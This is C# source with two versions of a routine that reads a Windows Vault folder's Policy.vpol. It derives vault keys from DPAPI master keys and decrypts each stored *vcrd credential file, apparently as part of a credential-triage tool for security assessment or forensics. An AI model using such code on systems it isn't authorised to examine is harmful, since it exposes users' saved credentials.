/// <summary>
/// Triages one Vault folder: reads <c>Policy.vpol</c>, asks
/// <c>Dpapi.DescribeVaultPolicy</c> for the vault keys (AES 128/256, per the
/// original author's note), and passes each <c>*vcrd</c> file in the folder to
/// <c>Dpapi.DescribeVaultCred</c> together with those keys.
/// </summary>
/// <param name="folder">Path of the Vault folder to inspect.</param>
/// <param name="MasterKeys">
/// Master-key map forwarded unchanged to <c>Dpapi.DescribeVaultPolicy</c>.
/// </param>
/// <remarks>
/// Returns silently when the folder has no <c>Policy.vpol</c>, when no keys are
/// returned, or when the folder holds no files. The file-system footprint of
/// this routine is a read of <c>Policy.vpol</c> followed by a read of every
/// file whose name ends in <c>vcrd</c>.
/// </remarks>
public static void TriageVaultFolder(string folder, Dictionary<string, string> MasterKeys)
{
    string policyPath = folder + "\\Policy.vpol";
    if (File.Exists(policyPath))
    {
        Console.WriteLine("\r\n[*] Triaging Vault folder: {0}", folder);

        // The policy file is the source of the vault keys; without keys
        // there is nothing further to do in this folder.
        var keys = Dpapi.DescribeVaultPolicy(File.ReadAllBytes(policyPath), MasterKeys);
        if (keys.Count < 1)
        {
            return;
        }

        string[] candidates = Directory.GetFiles(folder);
        if (candidates == null || candidates.Length == 0)
        {
            return;
        }

        for (int i = 0; i < candidates.Length; i++)
        {
            string candidate = candidates[i];

            // Default EndsWith overload: case-sensitive, current-culture match
            // on the trailing "vcrd" of the file name.
            if (Path.GetFileName(candidate).EndsWith("vcrd"))
            {
                try
                {
                    // Read and describe inside the try so a failure on one
                    // file is reported and the remaining files are still handled.
                    Dpapi.DescribeVaultCred(File.ReadAllBytes(candidate), keys);
                }
                catch (Exception e)
                {
                    Console.WriteLine("[X] Error triaging {0} : {1}", candidate, e.Message);
                }
            }
        }
    }
}
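/// <summary>
/// Triages one Vault folder: reads <c>Policy.vpol</c>, asks
/// <c>Dpapi.DescribePolicy</c> for the vault keys (AES 128/256, per the
/// original author's note), and passes each <c>*vcrd</c> file in the folder to
/// <c>Dpapi.DescribeVaultCred</c> together with those keys.
/// </summary>
/// <param name="folder">Path of the Vault folder to inspect.</param>
/// <param name="MasterKeys">
/// Master-key map forwarded unchanged to <c>Dpapi.DescribePolicy</c>.
/// </param>
/// <remarks>
/// Returns silently when the folder has no <c>Policy.vpol</c>, when no keys are
/// returned, or when the folder holds no files. Errors while reading or
/// describing an individual credential file are written to the console and do
/// not stop the remaining files from being processed.
/// </remarks>
public static void TriageVaultFolder(string folder, Dictionary<string, string> MasterKeys)
{
    string policyFilePath = String.Format("{0}\\Policy.vpol", folder);
    if (!File.Exists(policyFilePath))
    {
        return;
    }

    Console.WriteLine("\r\n[*] Triaging Vault folder: {0}", folder);

    byte[] policyBytes = File.ReadAllBytes(policyFilePath);

    // First try to get the vault keys from Policy.vpol; without keys there
    // is nothing further to do in this folder.
    ArrayList keys = Dpapi.DescribePolicy(policyBytes, MasterKeys);
    if (keys.Count <= 0)
    {
        return;
    }

    string[] vaultCredFiles = Directory.GetFiles(folder);
    if ((vaultCredFiles == null) || (vaultCredFiles.Length == 0))
    {
        return;
    }

    foreach (string vaultCredFile in vaultCredFiles)
    {
        string fileName = Path.GetFileName(vaultCredFile);

        // Ordinal comparison keeps the suffix test independent of the
        // current culture; it stays case-sensitive as before.
        if (!fileName.EndsWith("vcrd", StringComparison.Ordinal))
        {
            continue;
        }

        try
        {
            // The read sits inside the try so that one unreadable file
            // (locked, access denied, removed mid-scan) is reported and
            // skipped instead of ending the loop with an unhandled exception.
            byte[] vaultCredBytes = File.ReadAllBytes(vaultCredFile);

            // Describe the vault credential file using the policy keys.
            Dpapi.DescribeVaultCred(vaultCredBytes, keys);
        }
        catch (Exception e)
        {
            Console.WriteLine("[X] Error triaging {0} : {1}", vaultCredFile, e.Message);
        }
    }
}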